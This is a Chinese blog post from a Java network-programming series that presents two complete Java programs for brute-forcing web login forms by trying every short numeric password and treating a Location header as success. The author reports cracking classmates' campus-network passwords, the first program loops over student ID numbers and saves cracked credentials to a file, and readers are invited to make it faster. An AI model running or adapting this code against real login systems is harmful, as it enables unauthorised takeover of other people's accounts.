java网络编程五:暴力法破解登录系统的完全实现

最新推荐文章于 2024-04-24 22:52:03 发布
最新推荐文章于 2024-04-24 22:52:03 发布
阅读量1.8k 收藏 3
点赞数 1
分类专栏: JavaSE 文章标签: 破解 编程 java 网络 user firebug

注:以下破解思路及代码源自我同学木子

1、先来看一个无任何安全措施的登录系统的破解方法:每次模拟表单提交,若登录成功,此时返回的报头信息中有Location字段,登录失败无此字段,继续模拟登录。直到破解成功,本人成功破解部分同学校园网登录密码(纯四位数字的)代码如下:

view plain
  1. <span style="font-size:16px;">package demo.net;  
  2.   
  3. import java.io.IOException;  
  4. import java.io.PrintWriter;  
  5. import java.net.HttpURLConnection;  
  6. import java.net.URL;  
  7.   
  8. import mine.util.io.TextFile;  
  9.   
  10. //暴力法破解简单登录系统:该系统无任何安全措施  
  11. public class PostTest {  
  12.     String urlString = "登录页面的url";  
  13.   
  14.     public PostTest() {  
  15.     }  
  16.   
  17.     public PostTest(String urlString) {  
  18.         this.urlString = urlString;  
  19.     }  
  20.   
  21.     // 提交一次用户请求  
  22.     private boolean doPost(String user, String password) {  
  23.         boolean sucess = false;  
  24.         try {  
  25.             URL realUrl = new URL(urlString);  
  26.             HttpURLConnection conn = (HttpURLConnection) realUrl  
  27.                     .openConnection();  
  28.             conn.setDoOutput(true);  
  29.             conn.setDoInput(true);  
  30.             conn.setInstanceFollowRedirects(false);  
  31.   
  32.             // 提交表单,发送的数据是直接用Firebug截取的然后把用户名,密码部分换成参数  
  33.             PrintWriter out = new PrintWriter(conn.getOutputStream());  
  34.             out.print("要提交的表单信息");  
  35.             out.flush();  
  36.   
  37.             // 如果登录不成功,报头中没有Location字段,getHeaderField("Location") 返回null  
  38.             // 登录成功,返回一个随机的Location字段  
  39.             // System.out.println(conn.getHeaderFields());  
  40.             if (conn.getHeaderField("Location") != null) {  
  41.                 sucess = true;  
  42.             }  
  43.         } catch (IOException e) {  
  44.             e.printStackTrace();  
  45.         }  
  46.         return sucess;  
  47.     }  
  48.   
  49.     // 这是一个全排列算法, 对特定长度的密码排列组合,把结果存入list  
  50.     // user:用户名 , n:字符下标 , len:字符数组长度,也就是密码长度  
  51.     private boolean createPassWord(String user, char[] str, int n, int len) {  
  52.         if (n == len) {  
  53.             String ps = new String(str);  
  54.             if (doPost(user, ps)) {  
  55. //              System.out.println("sucess:" + user + " : " + ps);  
  56.                 TextFile.write("file/校园网用户名及密码.txt"true"sucess:" + user  
  57.                         + " : " + ps + "\n");  
  58.                 return true;  
  59.             }  
  60.             return false;  
  61.         }  
  62.         for (int i = 0; i <= 9; i++) {  
  63.             str[n] = (char) (i + '0');  
  64.             if (createPassWord(user, str, n + 1, len))  
  65.                 return true;  
  66.         }  
  67.         return false;  
  68.     }  
  69.   
  70.     // 破解一个用户的密码  
  71.     public void test(String user) {  
  72.         for (int i = 0; i < 4; i++) {  
  73.             if (createPassWord(user, new char[i + 1], 0, i + 1))  
  74.                 break;  
  75.         }  
  76.     }  
  77.   
  78.     public static void main(String[] args) {  
  79.         PostTest pt = new PostTest();  
  80.         for (int i = 1; i <= 9; i++)  
  81.             pt.test("09050510" + i);  
  82.         for (int i = 10; i <= 31; i++)  
  83.             pt.test("0905051" + i);  
  84.     }  
  85. }  
  86. </span>  


 

这个示例代码中只破解密码为4位或4位数字之内的密码,大概破解一个用户需要十分钟。如果破解5、6...更长的密码,破解时间将很长。

注:以下破解思路及代码源自我同学木子

2、在有些登录系统会采用安全措施,每次登录都会在url上产生一个随机值,该值为报头信息中的Location字段的值,所以破解时要先获得该值,然后组成真正的url给服务器发送表单信息,这里要进行两次连接,第一次获取Location字段的值,第二次才是真正的模拟登录。注意要御制重定向。代码如下:

view plain
  1. <span style="font-size:16px;">package demo.net;  
  2.   
  3. import java.io.IOException;  
  4. import java.io.PrintWriter;  
  5. import java.net.HttpURLConnection;  
  6. import java.net.URL;  
  7.   
  8. //暴力法破解登录系统:该登录系统的特征是报头信息中有Location字段,该字段的值随机生成  
  9. public class HttpTest {  
  10.     //要破解的登录系统的url  
  11.     String urlString = "要破解的系统的url";  
  12.   
  13.     public HttpTest() {  
  14.     }  
  15.   
  16.     public HttpTest(String urlString) {  
  17.         this.urlString = urlString;  
  18.     }  
  19.   
  20.     // 提交一次用户请求  
  21.     private boolean doPost(String user, String password) {  
  22.         boolean sucess = false;  
  23.         try {  
  24.             // 先通过url获取head中Location字段,这个字段是随机的,每次连接都不一样  
  25.             URL url = new URL(urlString);  
  26.             HttpURLConnection connection = (HttpURLConnection) url  
  27.                     .openConnection();  
  28.             connection.setRequestMethod("HEAD");  
  29.             connection.setInstanceFollowRedirects(false);// 不让重定向,这样才会返回Location字段信息  
  30.             connection.connect();  
  31.   
  32.             // 通过获取的Location字段的信息构造真正提交表单的url  
  33.             URL realUrl = new URL(urlString  
  34.                     + connection.getHeaderField("Location"));  
  35.             HttpURLConnection conn = (HttpURLConnection) realUrl  
  36.                     .openConnection();  
  37.             conn.setDoOutput(true);  
  38.             conn.setDoInput(true);  
  39.             conn.setInstanceFollowRedirects(false);  
  40.   
  41.             // 提交表单,发送的数据是直接用Firebug截取的然后把用户名,密码部分换成参数  
  42.             PrintWriter out = new PrintWriter(conn.getOutputStream());  
  43.             out.print("登录时提交的表单信息");  
  44.             out.flush();  
  45.   
  46.             // 如果登录不成功,报头中没有Location字段,getHeaderField("Location") 返回null  
  47.             // 登录成功,返回一个随机的Location字段  
  48.             // System.out.println(conn.getHeaderFields());  
  49.             if (conn.getHeaderField("Location") != null) {  
  50.                 sucess = true;  
  51.             }  
  52.         } catch (IOException e) {  
  53.             e.printStackTrace();  
  54.         }  
  55.         return sucess;  
  56.     }  
  57.   
  58.     // 这是一个全排列算法, 对特定长度的密码排列组合,把结果存入list  
  59.     // user:用户名 , n:字符下标 , len:字符数组长度,也就是密码长度  
  60.     private boolean createPassWord(String user, char[] str, int n, int len) {  
  61.         if (n == len) {  
  62.             String ps = new String(str);  
  63.             if (doPost(user, ps)) {  
  64.                 System.out.println("sucess:" + user + " : " + ps);  
  65.                 return true;  
  66.             }  
  67.             return false;  
  68.         }  
  69.         for (int i = 0; i <= 9; i++) {  
  70.             str[n] = (char) (i + '0');  
  71.             if (createPassWord(user, str, n + 1, len))  
  72.                 return true;  
  73.         }  
  74.         return false;  
  75.     }  
  76.   
  77.     // 破解一个用户的密码  
  78.     public void test(String user) {  
  79.         for (int i = 5; i < 20; i++) {  
  80.             if (createPassWord(user, new char[i + 1], 0, i + 1))  
  81.                 break;  
  82.         }  
  83.     }  
  84.   
  85.     public static void main(String[] args) {  
  86.         HttpTest pt = new HttpTest();  
  87.         pt.test("090505105");  
  88.     }  
  89. }  
  90. </span>  


当然以上两个代码示例只是原理上的实现,实际中成功概率不大,因为破解6位纯数字的密码大概要30个小时,而且很多密码中还有字母。。。有兴趣的可以优化一下代码啊,看能不能缩短破解时间。

stefshawn
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java破解网站密码
10-25
多线程破解网站密码,适用于无任何保护措施的网站,如很多学校的教务系统。 需要txt的用户名文件和txt的字典文件,暴力破解。本源码仅供交流学习用。 适用说明: 先用火狐的firebug截取网站登录页面的post消息,将用户名和密码部分取出来,整个消息就被截取成三段,分别填入信息段一,信息段二,信息段三。
通过java代码实现get登录的密码暴力破解
不怕死的假老练
09-03 2136
一、原理 GET请求会将参数放在URL中,如果通过GET请求登录,则会将用户名和密码放在URL中进行发送,此时我们可以通过构建URL来进行测试登录,并获取到返回的数据,来判定登录结果,来达到爆破的结果。 二、思路 我们需要通过socket的方式进行连接,并准备用户名和密码字典,依次取出字典中的值,通过两个for循环,用外层用户名,内层密码的方式构建URL,再依次发送,并接收返回的数据,判断登录结果。 此时需要注意的是,在发送了请求后,判定登录失败,则需要关闭socket,并重新建立socket进行下
Maven + Java FX出现问题:Caused by: java.lang.NullPointerException: Location is required.
bats的博客
06-25 1798
Maven + Java FX 路径错误以及配置详解参考StackOverflow我的解决方 参考StackOverflow 参考StackOverflow 报错:Caused by: java.lang.NullPointerException: Location is required. 原因:这种错误原因在于路径问题,说明这句话没有找到对应的fxml文件 FXMLLoader connectLoader = new FXMLLoader(getClass().getResource("/ui/ftp
Spring的统一资源加载策略
wang0907的博客
02-21 867
写在前面 什么是资源呢?最基本的本地磁盘上的一个文件,远端某服务器的一个图片,本地的一个jar包,本地的一个jar包内的内嵌jar包/内嵌class文件/内嵌properties文件,这些都是资源,为了能够满足各种资源的读取,spring定义了统一的资源加载策略。 1:Resource接口 该接口在spring的spring-core模块中,完整类名org.springframework.core.io.Resource,该接口组要是用来抽象资源的定义的,最终资源会封装为该接口类型的一个对象,然后使用该对象
java.lang.NullPointerException出现的几种原因及解决方案
热门推荐
天天的博客
06-21 16万+
主要介绍了java.lang.NullPointerException出现的几种原因及解决方案,本文给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下 java.lang.NullPointerException出现的几种原因: 1、字符串变量未初始化 2、接口类型的对象没有用具体的类初始化 3、当一个对象的值为空时,你没有判断为空的情况。
Caused by: java.lang.NullPointerException: getHeaderField(“Location“) must not be null
爬爬的博客
06-14 2735
开发 idea plugin 报错。
HttpURLConnection获取重定向目标的URL
D_MM_的博客
07-07 997
处理方:当 HTTP 响应返回状态码为 3xx 重定向时,服务器通常会在响应头中包含 "Location" 字段,指示客户端应该重定向到的新的URL地址。这只是一些常见的状态码示例,HTTP 协议还定义了其他状态码用于特定的情况。起因:客户给了一个外网图片路径,需要将外网图片上传到对象存储中,但是发现上传到对象存储中了,但是下载下来的图片是破损的。或其他相关库进行 HTTP 请求时,可以根据返回的状态码来判断请求的结果,并根据需要采取相应的处理措施。3xx:重定向状态码,表示需要进一步操作才能完成请求。
IDEA开发插件的相关参考
u012632105的博客
06-30 491
用gradle开发IDEA插件_idea gradle插件_ykdsg的博客-CSDN博客http://www.hzhcontrols.com/new-1381706.html※通过gradle开发idea插件,环境版本适配_wl1411956542的博客-CSDN博客
解决java.lang.NullPointerException: View must not be null!
沐风的博客
04-09 8270
昨天写项目的时候遇到一个“老朋友”:java.lang.NullPointerException: View must not be null!仔细查看了一下代码,发现view并不为空啊,琢磨了好久,通过查资料才发现if判断的时候出了纰漏,这里先放出错误原码:  case R.id.message:                 if (key.equals("1")){//如果消息来自推送
Java编程实现暴力破解WIFI密码的方分析
08-26
主要介绍了Java编程实现暴力破解WIFI密码的方,结合具体实例形式分析了java暴力破解WiFi密码的原理、操作步骤、实现技巧与相关注意事项,需要的朋友可以参考下
ssh.rar_Java编程_Python_
08-11
一个进行ssh暴力破解的简单的小脚本,需要进行简单修改,命令参数文件未上传
2018秋招java笔试题-java_review:Java评论
06-13
2018秋招java笔试题 Java Review 1. 数据结构和算 红黑树 代码: ) 图解: 2. 面试题 2021.4.10 英礡Improbable笔试题 (2021 Improbable Intern Online Test) 括号匹配 约瑟夫环 2021.03.31 华为校园招聘软件笔试题...
Java中常用的加密算及其实现原理详解-保护信息的铠甲,静默守护你的隐私
01-17
Java是一种流行的编程语言,提供了许多常用的加密算实现。  本篇文章将详细介绍Java中常用的加密算及其实现原理。我们将首先介绍对称加密算,包括DES、AES和RC4。然后,我们将介绍非对称加密算,包括RSA...
剑指offer第二到八章代码java实现
11-24
《剑指offer 名企面试官精讲典型编程题》书中第二章到第八章java代码实现,分章节package;实现代码包括原题目,以及其中的一些“本题扩展”;更具有详细的代码注释,很多代码从基础的暴力到书中的技巧解均有...
string模拟实现
m0_73969414的博客
04-23 827
c++中string的模拟实现,面试必会知识点
【1524】java投票管理系统Myeclipse开发mysql数据库web结构java编程计算机网页项目
qq_251836457的博客
04-18 855
2、开发环境为TOMCAT7.0,Myeclipse8.5开发,数据库为Mysql5.0,使用java语言开发。(5)投票选项管理:对投票选项信息进行添加、删除、修改和查看。(6)投票记录管理:对投票记录信息进行添加、删除、修改和查看。(1)管理员管理:对管理员信息进行添加、删除、修改和查看。(2)用户管理:对用户信息进行添加、删除、修改和查看。(3)公告管理:对公告信息进行添加、删除、修改和查看。(4)投票管理:对投票信息进行添加、删除、修改和查看。4)投票浏览查看、查看投票、投票记录。
PageHelper实现分页查询
m0_63849044的博客
04-24 649
这行代码是在使用 MyBatis Generator (MBG) 或类似的 MyBatis 工具生成的代码来构建查询条件。(可能是MyBatis的Mapper接口)来执行基于前面定义的查询条件的查询,并获取结果列表。实例之后会被用来设置各种查询条件,如字段的等于、不等于、大于、小于、模糊查询等。实体类生成的辅助类,它通常包含了一些静态内部类和方,用于构建查询条件。在MyBatis中,这样的对象通常用于构建查询条件。对象,可能用于作为查询条件)。的一个内部类,用于定义查询的具体条件。
Lambda表达式特点
最新发布
weixin_57763462的博客
04-24 316
**API 设计**:Lambda 表达式鼓励使用函数式接口的设计模式,这改变了 Java 库的设计,例如 `java.util.function` 包下的一系列函数式接口。- **函数式编程**:Lambda 表达式引入了函数式编程的理念,使得 Java 更接近于函数式编程语言,如 Scala 和 Clojure。- **并发编程**:Lambda 表达式与 Java 8 新增的 Stream API 结合使用,可以简化并发编程,特别是与集合的操作相关。
java编程中用到的算
03-27
1. 排序算:如冒泡排序、选择排序、插入排序、归并排序、快速排序等。 2. 查找算:如二分查找、哈希表查找等。 3. 图论算:如最短路径算、最小生成树算等。 4. 动态规划算:如背包问题、最长公共子序列问题、最大子数组和问题等。 5. 分治算:如求解逆序对问题、矩阵乘等。 6. 贪心算:如活动选择问题、背包问题等。 7. 字符串算:如暴力匹配算、KMP算、BM算等。 8. 数学算:如高斯消元、快速幂算、欧几里得算等。 9. 计算几何算:如点的位置关系、点的距离、线的交点等。 10. 随机化算:如随机化快速排序、Monte Carlo算、Las Vegas算等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值